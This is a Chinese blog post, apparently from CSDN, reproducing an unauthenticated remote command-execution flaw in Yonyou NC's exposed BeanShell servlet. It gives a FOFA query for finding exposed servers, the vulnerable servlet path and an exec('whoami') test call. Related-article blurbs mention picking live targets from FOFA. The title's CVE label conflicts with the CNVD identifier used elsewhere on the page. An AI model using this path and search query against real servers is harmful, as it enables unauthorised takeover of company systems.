用友NC-(CVE-2021-30167)未授权命令执行复现

最新推荐文章于 2024-06-06 14:01:55 发布
最新推荐文章于 2024-06-06 14:01:55 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/122281814
版权
漏洞复现 专栏收录该内容
36 篇文章 13 订阅 ¥9.90 ¥99.00
订阅专栏
这篇博客介绍了用友NC存在一个未授权命令执行漏洞(CVE-2021-30167),详细阐述了如何通过BeanShell接口构造恶意数据来执行代码。博主提供了POC代码,并警告该信息仅用于学习和测试,利用可能带来的损失需自负。
摘要由CSDN通过智能技术生成

简介

用友NC对外开放了BeanShell接口,可以在未授权的情况下直接访问该接口,并且构造恶意数据执行代码获取服务器命令执行。

fofa可以直接搜索:

title="YONYOU NC"

POC

拼接代码:

/servlet/~ic/bsh.servlet.BshServlet

漏洞验证

拼接poc代码请求后

测试一下exec函数命令执行

exec("whoami");

声明

提供的技术仅供学习参考测试,利用本文提供的信息造成的直接或简介损失由使用者自行承担。

结语

已无暇顾及过去,要向前走。

Cheng-Ling
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【CNVD-2021-30167用友NC BeanShell 漏洞复现(CNVD-2021-30167
千寻的博客
01-17 5112
用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。
用友NCNC Cloud MxServlet反序列化漏洞复现
0xSec
11-15 2242
用友NCNC Cloud系统存在反序列化漏洞,系统将用户传入的序列化数据进行过滤就直接执行了反序列化操作,结合系统本身存在的反序列化利用链,可造成了命令执行,深入利用可随意操作服务器。
用友NC BeanShell远程命令执行(CNVD-2021-30167)漏洞复现
最新发布
LfanBQX的博客
06-06 705
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。3.网站访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面。2.FOFA上挑选一位存在CNVD-2021-30167漏洞的幸运儿,进行验证。(2)对BeanShell接口添加授权认证机制。貌似所有版本都存在。
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 1722
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
CNVD-2021-30167 用友NC命令执行漏洞复现
qq_17754023的博客
02-28 2003
一、漏洞概述 2021年06月03日,用友官方发布了用友BeanShell远程代码执行漏洞的风险通告,漏洞编号为CNVD-2021-30167,漏洞等级:严重,漏洞评分:9.8。 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。成功利用该漏洞的攻击者可以直接在目标机器上执行任意代码,并以用友NC软件的用户权限执行任意命令。 该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 该漏洞利用复杂度低,攻击
Beanshell授权利用
m0_53183117的博客
08-10 647
用友Beanshell解释器写入文件
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的...
NC打开节点报已达授权数,该产品的用户数已达到产品授权数解决办法
热门推荐
u010890857的专栏
03-23 1万+
报错如图:   解决办法:删了bin目录下的licnese文件,重新在sysconfig里读取授权。然后重启下中间件。
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 8295
用友OA/NC/NCCloud漏洞集合
NC打开节点,系统提示该产品的用户数已达到产品授权数的解决方法
kyyh0386的博客
01-26 1757
模块编码2090是财务供应链模块,6080是人力薪酬模块,选中对应的行。找到动态建模平台-系统管理-授权使用监控。删除license占用。
用友nc 用户长时间没有任何操作,如何设置会话的失效时间?
Just do it!
05-07 5303
1.web应用(新开的) NC中间件环境下的web profile和NC中间件没有关系,NC中间件只不过是个J2EE运行环境,是个Container,当你的web项目启动后,NC中间件创建web容器,其web应用的会话超时时间由你的web部署描述符(web.xml)声明,示例代码如下:         30 在其他web容器下也类似,NC再创新也不至于更改servlet规范吧
用友NC6.5 BeanShell远程代码执行漏洞复现(CNVD-2021-30167
Kevin's Blog
06-03 5345
注:此文章仅供参考,经企业单位授权请勿非法测试! 一、漏洞介绍 1.1 NC介绍   用友NCV6.5系统作为用友软件公司主打互联网平台型的ERP系统,致力于以混合云模式支撑大型企业的互联网化。面向集团企业的管理软件,同类市场占有率达到亚太第一。 1.2 漏洞介绍   2021年5月27日CNVD公开用友NC存在远程命令执行漏洞: 该漏洞由于对外开放了BeanShell接口,导致恶意攻击者可以在授权情况下访问该接口,恶意攻击者通过开发不以为意开放的接口,构造恶意数据执行任意代码,最终获取服务器权限.
用友NC BeanShell_授权RCE
soldi_er的博客
07-13 1196
文章目录漏洞信息FofaZoomeye 漏洞信息   漏洞信息:CNVD-2021-301672021年6月通报。存在一个授权执行命令的接口,访问即可执行任意命令。   影响版本:NC 6.5 Fofa   fofa.so搜索语句:icon_hash=“1085941792” Zoomeye   zoomeye.org搜索语句:app:“Yonyou NC httpd”   直接点击ip地址右边的访问箭头➡️,进入首页: 直接访问/servlet/~ic/bsh.servlet.BshServl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值